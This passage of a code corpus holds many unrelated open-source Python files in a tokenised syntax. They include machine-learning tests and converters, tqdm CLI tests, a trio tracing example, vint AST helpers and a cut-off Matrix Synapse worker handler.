X.shape[1])<line_sep>model=clone(estimator)<line_sep>set_random_state(model)<line_sep>model.set_params(n_components=X.shape[1]-1)<line_sep>model.fit(*remove_y(model input_data labels))<assert_stmt>model.components_.shape<eq>(X.shape[1]-1 X.shape[1])<line_sep>model=clone(estimator)<line_sep>set_random_state(model)<line_sep>model.set_params(n_components=X.shape[1]+1)<with_stmt>pytest.raises(ValueError)<as>expected_err<block_start>model.fit(*remove_y(model input_data labels))<block_end><assert_stmt>(str(expected_err.value)<eq>'Invalid n_components, must be in [1, {}]'.format(X.shape[1]))<line_sep>model=clone(estimator)<line_sep>set_random_state(model)<line_sep>model.set_params(n_components=0)<with_stmt>pytest.raises(ValueError)<as>expected_err<block_start>model.fit(*remove_y(model input_data labels))<block_end><assert_stmt>(str(expected_err.value)<eq>'Invalid n_components, must be in [1, {}]'.format(X.shape[1]))<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
<def_stmt>find_bash <block_start><import_stmt>os<if_stmt>os.name<eq>'nt'<block_start><return>_find_windows_bash()<block_end><return>'/bin/bash'<block_end><def_stmt>_find_windows_bash <block_start>winreg=_winreg_module()<import_stmt>csv<line_sep>StringIO=_get_string_io()<import_from_stmt>os.path dirname<line_sep>sub_key='Directory\\shell\\git_shell\\command'<line_sep>value=winreg.QueryValue(winreg.HKEY_CLASSES_ROOT sub_key)<with_stmt>StringIO(value)<as>file<block_start>reader=csv.reader(file delimiter=' ' quotechar='"')<line_sep>git_bash_location=list(reader)[0][0]<line_sep>git_bash_directory=git_bash_location.split('\\git-bash.exe')[0]<line_sep>bash_location=git_bash_directory+'\\bin\\bash.exe'<line_sep><return>bash_location<block_end><block_end><def_stmt>_get_string_io <block_start><try_stmt><block_start><import_from_stmt>StringIO StringIO<block_end><except_stmt>ImportError<block_start><import_from_stmt>io StringIO<block_end><return>StringIO<block_end><def_stmt>_winreg_module <block_start><import_stmt>winreg<line_sep><return>winreg<block_end>
<import_from_stmt>vint.ast.node_type NodeType<import_from_stmt>vint.ast.plugin.scope_plugin.identifier_attribute IDENTIFIER_ATTRIBUTE IDENTIFIER_ATTRIBUTE_DYNAMIC_FLAG IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG IDENTIFIER_ATTRIBUTE_MEMBER_FLAG IDENTIFIER_ATTRIBUTE_FUNCTION_FLAG IDENTIFIER_ATTRIBUTE_AUTOLOAD_FLAG IDENTIFIER_ATTRIBUTE_FUNCTION_ARGUMENT_FLAG IDENTIFIER_ATTRIBUTE_LAMBDA_STRING_CONTEXT <def_stmt>create_id id_value is_declarative=<true> is_function=<false> is_autoload=<false> is_declarative_parameter=<false> is_on_str_expr_context=<false><block_start><return>{'type':NodeType.IDENTIFIER.value 'value':id_value IDENTIFIER_ATTRIBUTE:{IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG:is_declarative IDENTIFIER_ATTRIBUTE_DYNAMIC_FLAG:<false> IDENTIFIER_ATTRIBUTE_MEMBER_FLAG:<false> IDENTIFIER_ATTRIBUTE_FUNCTION_FLAG:is_function IDENTIFIER_ATTRIBUTE_AUTOLOAD_FLAG:is_autoload IDENTIFIER_ATTRIBUTE_FUNCTION_ARGUMENT_FLAG:is_declarative_parameter IDENTIFIER_ATTRIBUTE_LAMBDA_STRING_CONTEXT:is_on_str_expr_context } }<block_end><def_stmt>create_env env_value<block_start><return>{'type':NodeType.ENV.value 'value':env_value IDENTIFIER_ATTRIBUTE:{IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG:<true> IDENTIFIER_ATTRIBUTE_DYNAMIC_FLAG:<false> IDENTIFIER_ATTRIBUTE_MEMBER_FLAG:<false> IDENTIFIER_ATTRIBUTE_FUNCTION_FLAG:<false> IDENTIFIER_ATTRIBUTE_AUTOLOAD_FLAG:<false> IDENTIFIER_ATTRIBUTE_FUNCTION_ARGUMENT_FLAG:<false> IDENTIFIER_ATTRIBUTE_LAMBDA_STRING_CONTEXT:<false> } }<block_end><def_stmt>create_option opt_value<block_start><return>{'type':NodeType.OPTION.value 'value':opt_value IDENTIFIER_ATTRIBUTE:{IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG:<true> IDENTIFIER_ATTRIBUTE_DYNAMIC_FLAG:<false> IDENTIFIER_ATTRIBUTE_MEMBER_FLAG:<false> IDENTIFIER_ATTRIBUTE_FUNCTION_FLAG:<false> IDENTIFIER_ATTRIBUTE_AUTOLOAD_FLAG:<false> IDENTIFIER_ATTRIBUTE_FUNCTION_ARGUMENT_FLAG:<false> IDENTIFIER_ATTRIBUTE_LAMBDA_STRING_CONTEXT:<false> } }<block_end><def_stmt>create_reg reg_value<block_start><return>{'type':NodeType.REG.value 'value':reg_value IDENTIFIER_ATTRIBUTE:{IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG:<true> IDENTIFIER_ATTRIBUTE_DYNAMIC_FLAG:<false> IDENTIFIER_ATTRIBUTE_MEMBER_FLAG:<false> IDENTIFIER_ATTRIBUTE_FUNCTION_FLAG:<false> IDENTIFIER_ATTRIBUTE_AUTOLOAD_FLAG:<false> IDENTIFIER_ATTRIBUTE_FUNCTION_ARGUMENT_FLAG:<false> IDENTIFIER_ATTRIBUTE_LAMBDA_STRING_CONTEXT:<false> } }<block_end><def_stmt>create_curlyname is_declarative=<true><block_start>""" Create a node as a `my_{'var'}` """<line_sep><return>{'type':NodeType.CURLYNAME.value 'value':[{'type':NodeType.CURLYNAMEPART.value 'value':'my_' } {'type':NodeType.CURLYNAMEEXPR.value 'value':{'type':NodeType.CURLYNAMEEXPR.value 'value':'var' } }] IDENTIFIER_ATTRIBUTE:{IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG:is_declarative IDENTIFIER_ATTRIBUTE_DYNAMIC_FLAG:<true> IDENTIFIER_ATTRIBUTE_MEMBER_FLAG:<false> IDENTIFIER_ATTRIBUTE_FUNCTION_FLAG:<false> IDENTIFIER_ATTRIBUTE_AUTOLOAD_FLAG:<false> IDENTIFIER_ATTRIBUTE_FUNCTION_ARGUMENT_FLAG:<false> IDENTIFIER_ATTRIBUTE_LAMBDA_STRING_CONTEXT:<false> } }<block_end><def_stmt>create_subscript_member is_declarative=<true><block_start><return>{'type':NodeType.IDENTIFIER.value 'value':'member' IDENTIFIER_ATTRIBUTE:{IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG:is_declarative IDENTIFIER_ATTRIBUTE_DYNAMIC_FLAG:<false> IDENTIFIER_ATTRIBUTE_MEMBER_FLAG:<true> IDENTIFIER_ATTRIBUTE_FUNCTION_FLAG:<false> IDENTIFIER_ATTRIBUTE_AUTOLOAD_FLAG:<false> IDENTIFIER_ATTRIBUTE_FUNCTION_ARGUMENT_FLAG:<false> IDENTIFIER_ATTRIBUTE_LAMBDA_STRING_CONTEXT:<false> } }<block_end>
#! /usr/bin/env python2 # -*- coding: utf8 -*- <import_from_stmt>subprocess check_output<def_stmt>get_pass <block_start><return>check_output("pass gmail/me" shell=<true>).strip("\n")<block_end>
"""Convert a Caffe model file to TensorFlow checkpoint format. Assume that the network built is a equivalent (or a sub-) to the Caffe definition. """<import_stmt>tensorflow<as>tf<import_from_stmt>nets caffe_scope<import_from_stmt>nets nets_factory<line_sep>slim=tf.contrib.slim<line_sep># =========================================================================== # # Main flags. # =========================================================================== # tf.app.flags.DEFINE_string('model_name' 'ssd_300_vgg' 'Name of the model to convert.')<line_sep>tf.app.flags.DEFINE_string('num_classes' 21 'Number of classes in the dataset.')<line_sep>tf.app.flags.DEFINE_string('caffemodel_path' <none> 'The path to the Caffe model file to convert.')<line_sep>FLAGS=tf.app.flags.FLAGS<line_sep># =========================================================================== # # Main converting routine. # =========================================================================== # <def_stmt>main _# Caffe scope... <block_start>caffemodel=caffe_scope.CaffeScope()<line_sep>caffemodel.load(FLAGS.caffemodel_path)<line_sep>tf.logging.set_verbosity(tf.logging.INFO)<with_stmt>tf.Graph().as_default()<block_start>global_step=slim.create_global_step()<line_sep>num_classes=int(FLAGS.num_classes)<line_sep># Select the network. ssd_class=nets_factory.get_network(FLAGS.model_name)<line_sep>ssd_params=ssd_class.default_params._replace(num_classes=num_classes)<line_sep>ssd_net=ssd_class(ssd_params)<line_sep>ssd_shape=ssd_net.params.img_shape<line_sep># Image placeholder and model. shape=(1 ssd_shape[0] ssd_shape[1] 3)<line_sep>img_input=tf.placeholder(shape=shape dtype=tf.float32)<line_sep># Create model. <with_stmt>slim.arg_scope(ssd_net.arg_scope_caffe(caffemodel))<block_start>ssd_net.net(img_input is_training=<false>)<block_end>init_op=tf.global_variables_initializer()<with_stmt>tf.Session()<as>session# Run the init operation. <block_start>session.run(init_op)<line_sep># Save model in checkpoint. saver=tf.train.Saver()<line_sep>ckpt_path=FLAGS.caffemodel_path.replace('.caffemodel' '.ckpt')<line_sep>saver.save(session ckpt_path write_meta_graph=<false>)<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>tf.app.run()<block_end>
<import_stmt>argparse<import_stmt>os.path<as>osp<import_from_stmt>glob glob<import_stmt>cv2<import_stmt>pandas<as>pd<import_from_stmt>tqdm tqdm<import_from_stmt>gwd.converters kaggle2coco<def_stmt>parse_args <block_start>parser=argparse.ArgumentParser()<line_sep>parser.add_argument("--image-pattern" default="/data/SPIKE_images/*jpg")<line_sep>parser.add_argument("--annotation-root" default="/data/SPIKE_annotations")<line_sep>parser.add_argument("--kaggle_output_path" default="/data/spike.csv")<line_sep>parser.add_argument("--coco_output_path" default="/data/coco_spike.json")<line_sep><return>parser.parse_args()<block_end><def_stmt>main <block_start>args=parse_args()<line_sep>img_paths=glob(args.image_pattern)<line_sep>annotations=[]<for_stmt>img_path tqdm(img_paths)<block_start>ann_path=osp.join(args.annotation_root (osp.basename(img_path.replace("jpg" "bboxes.tsv"))))<line_sep>ann=pd.read_csv(ann_path sep="\t" names=["x_min" "y_min" "x_max" "y_max"])<line_sep>h,w=cv2.imread(img_path).shape[:2]<line_sep>ann[["x_min" "x_max"]]=ann[["x_min" "x_max"]].clip(0 w)<line_sep>ann[["y_min" "y_max"]]=ann[["y_min" "y_max"]].clip(0 h)<line_sep>ann["height"]=h<line_sep>ann["width"]=w<line_sep>ann["bbox_width"]=ann["x_max"]-ann["x_min"]<line_sep>ann["bbox_height"]=ann["y_max"]-ann["y_min"]<line_sep>ann=ann[(ann["bbox_width"]<g>0)&(ann["bbox_height"]<g>0)].copy()<line_sep>ann["bbox"]=ann[["x_min" "y_min" "bbox_width" "bbox_height"]].values.tolist()<line_sep>ann["image_id"]=osp.basename(img_path).split(".")[0]<line_sep>annotations.append(ann)<block_end>annotations=pd.concat(annotations)<line_sep>annotations["source"]="spike"<line_sep>print(annotations.head())<line_sep>annotations[["image_id" "source" "width" "height" "bbox"]].to_csv(args.kaggle_output_path index=<false>)<line_sep>kaggle2coco.main(args.kaggle_output_path args.coco_output_path)<block_end><if_stmt>__name__<eq>"__main__"<block_start>main()<block_end>
# Copyright (c) OpenMMLab. All rights reserved. <import_stmt>tempfile<import_from_stmt>mmocr.utils list_from_file list_to_file<line_sep>lists=[[] [' '] ['\t'] ['a'] [1] [1.] ['a' 'b'] ['a' 1 1.] [1 1. 'a'] ['啊' '啊啊'] ['選択' 'noël' 'Информацией' 'ÄÆä'] ]<def_stmt>test_list_to_file <block_start><with_stmt>tempfile.TemporaryDirectory()<as>tmpdirname<block_start><for_stmt>i,lines enumerate(lists)<block_start>filename=f'{tmpdirname}/{i}.txt'<line_sep>list_to_file(filename lines)<line_sep>lines2=[line.rstrip('\r\n')<for>line open(filename 'r' encoding='utf-8').readlines()]<line_sep>lines=list(map(str lines))<assert_stmt>len(lines)<eq>len(lines2)<assert_stmt>all(line1<eq>line2<for>line1,line2 zip(lines lines2))<block_end><block_end><block_end><def_stmt>test_list_from_file <block_start><with_stmt>tempfile.TemporaryDirectory()<as>tmpdirname<block_start><for_stmt>encoding ['utf-8' 'utf-8-sig']<block_start><for_stmt>lineend ['\n' '\r\n']<block_start><for_stmt>i,lines enumerate(lists)<block_start>filename=f'{tmpdirname}/{i}.txt'<with_stmt>open(filename 'w' encoding=encoding)<as>f<block_start>f.writelines(f'{line}{lineend}'<for>line lines)<block_end>lines2=list_from_file(filename encoding=encoding)<line_sep>lines=list(map(str lines))<assert_stmt>len(lines)<eq>len(lines2)<assert_stmt>all(line1<eq>line2<for>line1,line2 zip(lines lines2))<block_end><block_end><block_end><block_end><block_end>
<import_stmt>trio<import_stmt>os<import_stmt>json<import_from_stmt>itertools count<line_sep># Experiment with generating Chrome Event Trace format, which can be browsed # through chrome://tracing or other mechanisms. # # Screenshot: https://files.gitter.im/python-trio/general/fp6w/image.png # # Trace format docs: https://docs.google.com/document/d/1CvAClvFfyA5R-PhYUmn5OOQtYMH4h6I0nSsKchNAySU/preview# # # Things learned so far: # - I don't understand how the ph="s"/ph="f" flow events work – I think # they're supposed to show up as arrows, and I'm emitting them between tasks # that wake each other up, but they're not showing up. # - I think writing out json synchronously from each event is creating gaps in # the trace; maybe better to batch them up to write up all at once at the # end # - including tracebacks would be cool # - there doesn't seem to be any good way to group together tasks based on # nurseries. this really limits the value of this particular trace # format+viewer for us. (also maybe we should have an instrumentation event # when a nursery is opened/closed?) # - task._counter should maybe be public # - I don't know how to best show task lifetime, scheduling times, and what # the task is actually doing on the same plot. if we want to show particular # events like "called stream.send_all", then the chrome trace format won't # let us also show "task is running", because neither kind of event is # strictly nested inside the other <class_stmt>Trace(trio.abc.Instrument)<block_start><def_stmt>__init__ self out<block_start>self.out=out<line_sep>self.out.write("[\n")<line_sep>self.ids=count()<line_sep>self._task_metadata(-1 "I/O manager")<block_end><def_stmt>_write self **ev<block_start>ev.setdefault("pid" os.getpid())<if_stmt>ev["ph"]<ne>"M"<block_start>ev.setdefault("ts" trio.current_time()<times>1e6)<block_end>self.out.write(json.dumps(ev))<line_sep>self.out.write(",\n")<block_end><def_stmt>_task_metadata self tid name<block_start>self._write(name="thread_name" ph="M" tid=tid args={"name":name} )<line_sep>self._write(name="thread_sort_index" ph="M" tid=tid args={"sort_index":tid} )<block_end><def_stmt>task_spawned self task<block_start>self._task_metadata(task._counter task.name)<line_sep>self._write(name="task lifetime" ph="B" tid=task._counter )<block_end><def_stmt>task_exited self task<block_start>self._write(name="task lifetime" ph="E" tid=task._counter )<block_end><def_stmt>before_task_step self task<block_start>self._write(name="running" ph="B" tid=task._counter )<block_end><def_stmt>after_task_step self task<block_start>self._write(name="running" ph="E" tid=task._counter )<block_end><def_stmt>task_scheduled self task<block_start><try_stmt><block_start>waker=trio.lowlevel.current_task()<block_end><except_stmt>RuntimeError<block_start><pass><block_end><else_stmt><block_start>id=next(self.ids)<line_sep>self._write(ph="s" cat="wakeup" id=id tid=waker._counter )<line_sep>self._write(cat="wakeup" ph="f" id=id tid=task._counter )<block_end><block_end><def_stmt>before_io_wait self timeout<block_start>self._write(name=f"I/O wait" ph="B" tid=-1 )<block_end><def_stmt>after_io_wait self timeout<block_start>self._write(name=f"I/O wait" ph="E" tid=-1 )<block_end><block_end><async_keyword><def_stmt>child1 <block_start>print(" child1: started! sleeping now...")<line_sep><await>trio.sleep(1)<line_sep>print(" child1: exiting!")<block_end><async_keyword><def_stmt>child2 <block_start>print(" child2: started! sleeping now...")<line_sep><await>trio.sleep(1)<line_sep>print(" child2: exiting!")<block_end><async_keyword><def_stmt>parent <block_start>print("parent: started!")<async_keyword><with_stmt>trio.open_nursery()<as>nursery<block_start>print("parent: spawning child1...")<line_sep>nursery.start_soon(child1)<line_sep>print("parent: spawning child2...")<line_sep>nursery.start_soon(child2)<line_sep>print("parent: waiting for children to finish...")<line_sep># -- we exit the nursery block here -- <block_end>print("parent: all done!")<block_end>t=Trace(open("/tmp/t.json" "w"))<line_sep>trio.run(parent instruments=[t])<line_sep>
<import_from_stmt>typing List<line_sep># 移动零 <class_stmt>Solution# 新开一个数组 <block_start><def_stmt>moveZeroes1 self nums:List[int]<arrow><none><block_start>temp,k=[0]<times>len(nums) 0<for_stmt>n nums<block_start><if_stmt>n<ne>0<block_start>temp[k]=n<line_sep>k<augadd>1<block_end><block_end>nums[:]=temp[:]<block_end># 双指针解法 <def_stmt>moveZeroes2 self nums:List[int]<arrow><none><block_start>k=0<for_stmt>i,v enumerate(nums)<block_start><if_stmt>v<ne>0<block_start>nums[i],nums[k]=nums[k] nums[i]<line_sep>k<augadd>1<block_end><block_end><block_end><block_end>
"""Test CLI usage."""<import_stmt>logging<import_stmt>subprocess# nosec <import_stmt>sys<import_from_stmt>functools wraps<import_from_stmt>os linesep<import_from_stmt>tqdm.cli TqdmKeyError TqdmTypeError main<import_from_stmt>tqdm.utils IS_WIN<import_from_stmt>.tests_tqdm BytesIO _range closing mark raises<def_stmt>restore_sys func<block_start>"""Decorates `func(capsysbin)` to save & restore `sys.(stdin|argv)`."""<line_sep>@wraps(func)<def_stmt>inner capsysbin<block_start>"""function requiring capsysbin which may alter `sys.(stdin|argv)`"""<line_sep>_SYS=sys.stdin sys.argv<try_stmt><block_start>res=func(capsysbin)<block_end><finally_stmt><block_start>sys.stdin,sys.argv=_SYS<block_end><return>res<block_end><return>inner<block_end><def_stmt>norm bytestr<block_start>"""Normalise line endings."""<line_sep><return>bytestr<if>linesep<eq>"\n"<else>bytestr.replace(linesep.encode() b"\n")<block_end>@mark.slow<def_stmt>test_pipes <block_start>"""Test command line pipes"""<line_sep>ls_out=subprocess.check_output(['ls'])# nosec ls=subprocess.Popen(['ls'] stdout=subprocess.PIPE)# nosec res=subprocess.Popen(# nosec [sys.executable '-c' 'from tqdm.cli import main; main()'] stdin=ls.stdout stdout=subprocess.PIPE stderr=subprocess.PIPE)<line_sep>out,err=res.communicate()<assert_stmt>ls.poll()<eq>0<line_sep># actual test: <assert_stmt>norm(ls_out)<eq>norm(out)<assert_stmt>b"it/s"<in>err<block_end><if_stmt>sys.version_info[:2]<ge>(3 8)<block_start>test_pipes=mark.filterwarnings("ignore:unclosed file:ResourceWarning")(test_pipes)<block_end><def_stmt>test_main_import <block_start>"""Test main CLI import"""<line_sep>N=123<line_sep>_SYS=sys.stdin sys.argv<line_sep># test direct import sys.stdin=[str(i).encode()<for>i _range(N)]<line_sep>sys.argv=['' '--desc' 'Test CLI import' '--ascii' 'True' '--unit_scale' 'True']<try_stmt><block_start><import_stmt>tqdm.__main__# NOQA, pylint: disable=unused-variable <block_end><finally_stmt><block_start>sys.stdin,sys.argv=_SYS<block_end><block_end>@restore_sys<def_stmt>test_main_bytes capsysbin<block_start>"""Test CLI --bytes"""<line_sep>N=123<line_sep># test --delim IN_DATA='\0'.join(map(str _range(N))).encode()<with_stmt>closing(BytesIO())<as>sys.stdin<block_start>sys.stdin.write(IN_DATA)<line_sep># sys.stdin.write(b'\xff') # TODO sys.stdin.seek(0)<line_sep>main(sys.stderr ['--desc' 'Test CLI delim' '--ascii' 'True' '--delim' r'\0' '--buf_size' '64'])<line_sep>out,err=capsysbin.readouterr()<assert_stmt>out<eq>IN_DATA<assert_stmt>str(N)+"it"<in>err.decode("U8")<block_end># test --bytes IN_DATA=IN_DATA.replace(b'\0' b'\n')<with_stmt>closing(BytesIO())<as>sys.stdin<block_start>sys.stdin.write(IN_DATA)<line_sep>sys.stdin.seek(0)<line_sep>main(sys.stderr ['--ascii' '--bytes=True' '--unit_scale' 'False'])<line_sep>out,err=capsysbin.readouterr()<assert_stmt>out<eq>IN_DATA<assert_stmt>str(len(IN_DATA))+"B"<in>err.decode("U8")<block_end><block_end>@mark.skipif(sys.version_info[0]<eq>2 reason="no caplog on py2")<def_stmt>test_main_log capsysbin caplog<block_start>"""Test CLI --log"""<line_sep>_SYS=sys.stdin sys.argv<line_sep>N=123<line_sep>sys.stdin=[(str(i)+'\n').encode()<for>i _range(N)]<line_sep>IN_DATA=b''.join(sys.stdin)<try_stmt><block_start><with_stmt>caplog.at_level(logging.INFO)<block_start>main(sys.stderr ['--log' 'INFO'])<line_sep>out,err=capsysbin.readouterr()<assert_stmt>norm(out)<eq>IN_DATA<and>b"123/123"<in>err<assert_stmt><not>caplog.record_tuples<block_end><with_stmt>caplog.at_level(logging.DEBUG)<block_start>main(sys.stderr ['--log' 'DEBUG'])<line_sep>out,err=capsysbin.readouterr()<assert_stmt>norm(out)<eq>IN_DATA<and>b"123/123"<in>err<assert_stmt>caplog.record_tuples<block_end><block_end><finally_stmt><block_start>sys.stdin,sys.argv=_SYS<block_end><block_end>@restore_sys<def_stmt>test_main capsysbin<block_start>"""Test misc CLI options"""<line_sep>N=123<line_sep>sys.stdin=[(str(i)+'\n').encode()<for>i _range(N)]<line_sep>IN_DATA=b''.join(sys.stdin)<line_sep># test --tee main(sys.stderr ['--mininterval' '0' '--miniters' '1'])<line_sep>out,err=capsysbin.readouterr()<assert_stmt>norm(out)<eq>IN_DATA<and>b"123/123"<in>err<assert_stmt>N<le>len(err.split(b"\r"))<l>N+5<line_sep>len_err=len(err)<line_sep>main(sys.stderr ['--tee' '--mininterval' '0' '--miniters' '1'])<line_sep>out,err=capsysbin.readouterr()<assert_stmt>norm(out)<eq>IN_DATA<and>b"123/123"<in>err<line_sep># spaces to clear intermediate lines could increase length <assert_stmt>len_err+len(norm(out))<le>len(err)<line_sep># test --null main(sys.stderr ['--null'])<line_sep>out,err=capsysbin.readouterr()<assert_stmt><not>out<and>b"123/123"<in>err<line_sep># test integer --update main(sys.stderr ['--update'])<line_sep>out,err=capsysbin.readouterr()<assert_stmt>norm(out)<eq>IN_DATA<assert_stmt>(str(N<floordiv>2<times>N)+"it").encode()<in>err "expected arithmetic sum formula"<line_sep># test integer --update_to main(sys.stderr ['--update-to'])<line_sep>out,err=capsysbin.readouterr()<assert_stmt>norm(out)<eq>IN_DATA<assert_stmt>(str(N-1)+"it").encode()<in>err<assert_stmt>(str(N)+"it").encode()<not><in>err<with_stmt>closing(BytesIO())<as>sys.stdin<block_start>sys.stdin.write(IN_DATA.replace(b'\n' b'D'))<line_sep># test integer --update --delim sys.stdin.seek(0)<line_sep>main(sys.stderr ['--update' '--delim' 'D'])<line_sep>out,err=capsysbin.readouterr()<assert_stmt>out<eq>IN_DATA.replace(b'\n' b'D')<assert_stmt>(str(N<floordiv>2<times>N)+"it").encode()<in>err "expected arithmetic sum"<line_sep># test integer --update_to --delim sys.stdin.seek(0)<line_sep>main(sys.stderr ['--update-to' '--delim' 'D'])<line_sep>out,err=capsysbin.readouterr()<assert_stmt>out<eq>IN_DATA.replace(b'\n' b'D')<assert_stmt>(str(N-1)+"it").encode()<in>err<assert_stmt>(str(N)+"it").encode()<not><in>err<block_end># test float --update_to sys.stdin=[(str(i/2.0)+'\n').encode()<for>i _range(N)]<line_sep>IN_DATA=b''.join(sys.stdin)<line_sep>main(sys.stderr ['--update-to'])<line_sep>out,err=capsysbin.readouterr()<assert_stmt>norm(out)<eq>IN_DATA<assert_stmt>(str((N-1)/2.0)+"it").encode()<in>err<assert_stmt>(str(N/2.0)+"it").encode()<not><in>err<block_end>@mark.slow@mark.skipif(IS_WIN reason="no manpages on windows")<def_stmt>test_manpath tmp_path<block_start>"""Test CLI --manpath"""<line_sep>man=tmp_path/"tqdm.1"<assert_stmt><not>man.exists()<with_stmt>raises(SystemExit)<block_start>main(argv=['--manpath' str(tmp_path)])<block_end><assert_stmt>man.is_file()<block_end>@mark.slow@mark.skipif(IS_WIN reason="no completion on windows")<def_stmt>test_comppath tmp_path<block_start>"""Test CLI --comppath"""<line_sep>man=tmp_path/"tqdm_completion.sh"<assert_stmt><not>man.exists()<with_stmt>raises(SystemExit)<block_start>main(argv=['--comppath' str(tmp_path)])<block_end><assert_stmt>man.is_file()<line_sep># check most important options appear script=man.read_text()<line_sep>opts={'--help' '--desc' '--total' '--leave' '--ncols' '--ascii' '--dynamic_ncols' '--position' '--bytes' '--nrows' '--delim' '--manpath' '--comppath'}<assert_stmt>all(args<in>script<for>args opts)<block_end>@restore_sys<def_stmt>test_exceptions capsysbin<block_start>"""Test CLI Exceptions"""<line_sep>N=123<line_sep>sys.stdin=[str(i)+'\n'<for>i _range(N)]<line_sep>IN_DATA=''.join(sys.stdin).encode()<with_stmt>raises(TqdmKeyError match="bad_arg_u_ment")<block_start>main(sys.stderr argv=['-ascii' '-unit_scale' '--bad_arg_u_ment' 'foo'])<block_end>out,_=capsysbin.readouterr()<assert_stmt>norm(out)<eq>IN_DATA<with_stmt>raises(TqdmTypeError match="invalid_bool_value")<block_start>main(sys.stderr argv=['-ascii' '-unit_scale' 'invalid_bool_value'])<block_end>out,_=capsysbin.readouterr()<assert_stmt>norm(out)<eq>IN_DATA<with_stmt>raises(TqdmTypeError match="invalid_int_value")<block_start>main(sys.stderr argv=['-ascii' '--total' 'invalid_int_value'])<block_end>out,_=capsysbin.readouterr()<assert_stmt>norm(out)<eq>IN_DATA<with_stmt>raises(TqdmKeyError match="Can only have one of --")<block_start>main(sys.stderr argv=['--update' '--update_to'])<block_end>out,_=capsysbin.readouterr()<assert_stmt>norm(out)<eq>IN_DATA<line_sep># test SystemExits <for_stmt>i ('-h' '--help' '-v' '--version')<block_start><with_stmt>raises(SystemExit)<block_start>main(argv=[i])<block_end><block_end><block_end>
<import_stmt>os<def_stmt>replace_version old_version new_version<block_start><if_stmt><not>isinstance(old_version tuple)<or><not>isinstance(new_version tuple)<block_start><raise>ValueError("`old_version` and `new_version` must be a version tuple. Eg: (1.2.3)")<block_end>major,minor,micro=old_version[:3]<line_sep>old_version=f'{major}.{minor}.{micro}'<line_sep>major,minor,micro=new_version[:3]<line_sep>new_version=f'{major}.{minor}.{micro}'<line_sep>print(f"New version = {new_version}")<for_stmt>root,_,files os.walk('../caer')<block_start><for_stmt>file files<block_start><if_stmt>file.endswith(('.py' '.cpp' '.c' '.h' '.hpp'))<block_start><with_stmt>open(os.path.abspath(os.path.join(root file)) 'r')<as>f<block_start>new_text=f.read().replace('version '+old_version 'version '+new_version)<block_end><with_stmt>open(os.path.abspath(os.path.join(root file)) 'w')<as>f<block_start>print(os.path.abspath(os.path.join(root file)))<line_sep>f.write(new_text)<block_end><block_end><block_end><block_end><block_end>replace_version((1 8 0) (3 9 1))<line_sep>
<import_from_stmt>.version VersionViewSet DeployVersionViewSet<line_sep>__all__=["VersionViewSet" "DeployVersionViewSet"]<line_sep>
<import_stmt>warnings<import_from_stmt>.xilinx XilinxPlatform<line_sep>__all__=["XilinxSpartan3APlatform" "XilinxSpartan6Platform"]<line_sep>XilinxSpartan3APlatform=XilinxPlatform<line_sep>XilinxSpartan6Platform=XilinxPlatform<line_sep># TODO(amaranth-0.4): remove warnings.warn("instead of amaranth.vendor.xilinx_spartan_3_6.XilinxSpartan3APlatform and "<concat>".XilinxSpartan6Platform, use amaranth.vendor.xilinx.XilinxPlatform" DeprecationWarning stacklevel=2)<line_sep>
# Copyright 2018-2021 The Matrix.org Foundation C.I.C. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>logging<import_from_stmt>typing TYPE_CHECKING List Optional Tuple<import_from_stmt>synapse.api.errors SynapseError<import_from_stmt>synapse.handlers.room_member RoomMemberHandler<import_from_stmt>synapse.replication.http.membership ReplicationRemoteJoinRestServlet<as>ReplRemoteJoin ReplicationRemoteKnockRestServlet<as>ReplRemoteKnock ReplicationRemoteRejectInviteRestServlet<as>ReplRejectInvite ReplicationRemoteRescindKnockRestServlet<as>ReplRescindKnock ReplicationUserJoinedLeftRoomRestServlet<as>ReplJoinedLeft <import_from_stmt>synapse.types JsonDict Requester UserID<if_stmt>TYPE_CHECKING<block_start><import_from_stmt>synapse.server HomeServer<block_end>logger=logging.getLogger(__name__)<class_stmt>RoomMemberWorkerHandler(RoomMemberHandler)<block_start><def_stmt>__init__ self hs:"HomeServer"<block_start>super().__init__(hs)<line_sep>self._remote_join_client=ReplRemoteJoin.make_client(hs)<line_sep>self._remote_knock_client=ReplRemoteKnock.make_client(hs)<line_sep>self._remote_reject_client=ReplRejectInvite.make_client(hs)<line_sep>self._remote_rescind_client=ReplRescindKnock.make_client(hs)<line_sep>self._notify_change_client=ReplJoinedLeft.make_client(hs)<block_end><async_keyword><def_stmt>_remote_join self requester:Requester remote_room_hosts:List[str] room_id:str user:UserID content:dict <arrow>Tuple[str int]<block_start>"""Implements RoomMemberHandler._remote_join"""<if_stmt>len(remote_room_hosts)<eq>0<block_start><raise>SynapseError(404 "No known servers")<block_end>ret=<await>self._remote_join_client(requester=requester remote_room_hosts=remote_room_hosts room_id=room_id user_id=user.to_string() content=content )<line_sep><return>ret["event_id"] ret["stream_id"]<block_end><async_keyword><def_stmt>remote_reject_invite self invite_event_id:str txn_id:Optional[str] requester:Requester content:dict <arrow>Tuple[str int]<block_start>""" Rejects an out-of-band invite received from a remote user Implements RoomMemberHandler.remote_reject_invite """<line_sep>ret=<await>self._remote_reject_client(invite_event_id=invite_event_id txn_id=txn_id requester=requester content=content )<line_sep><return>ret["event_id"] ret["stream_id"]<block_end><async_keyword><def_stmt>remote_rescind_knock self knock_event_id:str txn_id:Optional[str] requester:Requester content:JsonDict <arrow>Tuple[str int]<block_start>""" Rescinds a local knock made on a remote room Args: knock_event_id: the knock event txn_id: optional transaction ID supplied by the client requester: user making the request, according to the access token content: additional content to include in the leave event. Normally an empty dict. Returns: A tuple containing (event_id, stream_id of the leave event) """<line_sep>ret=<await>self._remote_rescind_client(knock_event_id=knock_event_id txn_id=txn_id requester=requester content=content )<line_sep><return>ret["event_id"] 